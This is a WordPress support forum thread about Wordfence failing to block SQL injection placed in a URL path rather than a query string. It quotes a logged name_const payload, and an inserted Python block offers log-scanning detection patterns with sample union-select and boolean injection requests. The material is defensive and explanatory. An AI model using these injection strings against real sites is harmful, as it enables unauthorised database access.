• Resolved iulianh

    (@iulianh)


    Hello,

    Why is Wordfence not blocking the IP when someone is doing SQL injection?
    Here are logs from a website with Wordfence active, and it didn’t block the IP automatically!
    I received an email after a long time saying that we have an Increased Attack Rate, but it didn’t block the IP!
    The SQL injection attack from that IP went on over 1000 times!


  • Same here! Crazy…

    Hi @iulianh and @gorem,

    Wordfence does not catch SQL injections that are not submitted through a query parameter.

    Looking at the URL in question, GET /categorie-produs/ciorbe-supe-creme/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(98,77,83,83,101,77,112,84,109,65,97),1),name_const(CHAR(98,77,83,83,101,77,112,84,109,65,97),1))a)%20–%20%27x%27=%27x, the SQL injection occurs without ?something=***; it just has the SQL at the end of the URL.

    Wordfence’s SQL injection protection is focused on looking at query strings, where custom plugins on your site might read and blindly execute on the database.

    Dave
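The distinction drawn in the reply above, between SQL placed in the URL path and SQL placed in a query parameter, can be checked from the access log itself. The following is an added example, not Wordfence code and not part of the original thread: it URL-decodes each request target, labels where a SQL injection marker appears, and lists client IPs at or over a threshold. The regular expressions, the `classify` and `scan` names, the threshold and the sample log lines are all assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} ')

# Heuristic SQLi markers applied after URL-decoding (illustrative, not exhaustive).
SQLI_RE = re.compile(r"""
      name_const\s*\(                 # MySQL function used in the logged payloads
    | union\s+select
    | select\s*\*\s*from
    | ['"]\s*(?:or|and)\s+['"(\d]     # quote break-out followed by a boolean test
    """, re.IGNORECASE | re.VERBOSE)

def classify(target):
    """Return which URL parts ('path', 'query') carry a SQLi marker."""
    parts = urlsplit(target)
    hits = set()
    if SQLI_RE.search(unquote(parts.path)):
        hits.add("path")
    if SQLI_RE.search(unquote(parts.query)):
        hits.add("query")
    return hits

def scan(lines, threshold=2):
    """Count flagged requests per (ip, part); list IPs at or over threshold."""
    counts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            for part in classify(m.group(2)):
                counts[(m.group(1), part)] += 1
    per_ip = Counter()
    for (ip, _part), n in counts.items():
        per_ip[ip] += n
    return counts, sorted(ip for ip, n in per_ip.items() if n >= threshold)

# Constructed sample lines (documentation IP ranges, made-up paths).
_T = '[01/Jan/2020:12:00:00 +0000]'
SAMPLE = [
    f'203.0.113.7 - - {_T} "GET /despre-noi/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(97),1))a)%20--%20%27x%27=%27x HTTP/1.0" 301 661 "-" "-"',
    f'203.0.113.7 - - {_T} "GET /galerie-foto/99999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x HTTP/1.0" 301 661 "-" "-"',
    f'203.0.113.7 - - {_T} "GET /shop/?add-to-cart=2491%22%20and%20%22x%22%3D%22x HTTP/1.0" 200 11520 "-" "-"',
    f'203.0.113.7 - - {_T} "GET / HTTP/1.0" 200 12545 "-" "-"',
    f'198.51.100.20 - - {_T} "GET /contact/ HTTP/1.0" 200 9000 "-" "-"',
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

The per-part counts show how much of a client's probing sits in the path, where a rule that only inspects query parameters would not see it; the offender list can feed a manual block or a server-level rate limit.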

    Thread Starter iulianh

    (@iulianh)

    Hi,
    @wfdave

    Then it is not doing the job well! It should protect the whole URL, not only the ones with ?something=***

    Thank you
